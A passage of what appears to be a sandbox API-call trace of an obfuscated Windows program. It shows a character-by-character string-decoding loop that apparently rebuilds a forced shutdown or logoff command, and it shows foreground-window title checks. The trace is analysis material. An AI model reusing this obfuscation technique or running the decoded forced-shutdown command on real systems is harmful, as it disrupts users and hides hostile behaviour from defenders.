lpUsedDefaultChar=0x0) returned 1 [0179.209] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.209] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0179.209] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.209] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="t", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="t\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.210] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.210] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="g", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="g") returned 1 [0179.210] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.211] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.211] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.211] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.211] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.212] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.212] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.212] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.212] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.213] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.213] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0179.261] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.262] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.262] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.262] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.262] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.263] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.263] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="d", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="d") returned 1 [0179.263] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.263] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.264] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.264] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0179.264] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.264] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="„", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x84\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.264] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="w", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="w") returned 1 [0179.265] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.265] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.265] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.265] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0179.265] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.266] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.266] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.266] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.266] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.267] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.267] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.267] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.267] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.268] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0179.268] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.268] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.268] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.268] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.269] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.269] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.269] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.269] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.269] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="s", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="s\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.270] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="f", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="f") returned 1 [0179.270] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.270] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.270] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.270] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.271] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.271] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=":", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=":\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.271] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.271] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="-", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="-") returned 1 [0179.271] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.272] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.272] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.272] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0179.272] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.273] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.273] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0179.273] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.273] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.274] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.274] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.274] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.274] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="=", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="=\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.274] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.275] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="0", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="0") returned 1 [0179.275] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.275] GetForegroundWindow () returned 0x20086 [0179.275] GetLastError () returned 0x0 [0179.276] SysStringLen (param_1=" ") returned 0xff [0179.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=255, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 255 [0179.276] SysStringLen (param_1=" ") returned 0xff [0179.276] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=" ", cchWideChar=256, lpMultiByteStr=0x11644c4, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" ", lpUsedDefaultChar=0x0) returned 256 [0179.276] GetWindowTextA (in: hWnd=0x20086, lpString=0x11644c4, nMaxCount=255 | out: lpString="Program Manager") returned 15 [0179.276] GetLastError () returned 0x0 [0179.277] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=255, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 255 [0179.277] SysStringByteLen (bstr="牐杯慲慍慮敧r††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††††† ") returned 0xff [0179.277] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Program Manager", cbMultiByte=256, lpWideCharStr=0x114bcc4, cchWideChar=511 | out: lpWideCharStr="Program Manager") returned 256 [0179.277] SysStringLen (param_1="Pro") returned 0x3 [0179.277] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Pro", cchWideChar=4, lpMultiByteStr=0x11684fc, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Pro", lpUsedDefaultChar=0x0) returned 4 [0179.278] SetWindowTextA (hWnd=0x103c4, lpString="Pro") returned 1 [0179.278] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x5 [0179.278] GetFocus () returned 0x0 [0179.278] lstrlenA (lpString="Pro") returned 3 [0179.278] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xc, wParam=0x0, lParam=0x11684fc) returned 0x1 [0179.278] IsWindow (hWnd=0x103c4) returned 1 [0179.279] IsWindow (hWnd=0x103c4) returned 1 [0179.279] IsWindow (hWnd=0x103c4) returned 1 [0179.279] IsWindow (hWnd=0x103c4) returned 1 [0179.280] GetFocus () returned 0x0 [0179.280] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xe, wParam=0x0, lParam=0x0) returned 0x3 [0179.280] GetFocus () returned 0x0 [0179.280] RtlAllocateHeap (HeapHandle=0x10d0000, Flags=0x0, Size=0x4) returned 0x10ebcd0 [0179.280] CallWindowProcA (lpPrevWndFunc=0x77adabb2, hWnd=0x103c4, Msg=0xd, wParam=0x4, lParam=0x10ebcd0) returned 0x3 [0179.280] GetFocus () returned 0x0 [0179.280] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 4 [0179.281] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="Pro", cbMultiByte=-1, lpWideCharStr=0x11684fc, cchWideChar=4 | out: lpWideCharStr="Pro") returned 4 [0179.281] HeapFree (in: hHeap=0x10d0000, dwFlags=0x0, lpMem=0x10ebcd0 | out: hHeap=0x10d0000) returned 1 [0179.281] VarCmp (pvarLeft=0x28f190, pvarRight=0x28f1f8, lcid=0x0, dwFlags=0x30001) returned 0x0 [0179.282] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.282] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.282] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0179.282] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.283] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="V", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="V\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.283] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.283] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="I", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="I") returned 1 [0179.283] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="[", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.284] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.284] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="N", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="N") returned 1 [0179.284] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.284] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="Q", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Q\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.285] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.285] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="D", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="D") returned 1 [0179.285] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.285] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\\", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\\\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.286] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.286] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="O", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="O") returned 1 [0179.286] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.286] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.286] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.287] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0x116854c, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0179.287] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.287] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.287] VarSub (in: pvarLeft=0x28f1d8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.288] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0x11684fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0179.288] VarCat (in: pvarLeft=0x28f1f8, pvarRight=0x28f1b0, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.288] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.289] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0x116863c, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0179.289] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.289] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.289] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.289] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0x1150ca4, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0179.290] VarCat (in: pvarLeft=0x28f208, pvarRight=0x28f218, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.290] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f0c6, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82\x01Ìò(", lpUsedDefaultChar=0x0) returned 1 [0179.290] VarSub (in: pvarLeft=0x28f1e8, pvarRight=0x28f160, pvarResult=0x28f190 | out: pvarResult=0x28f190) returned 0x0 [0179.290] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0x116859c, cchWideChar=1 | out: lpWideCharStr="u") returned 1 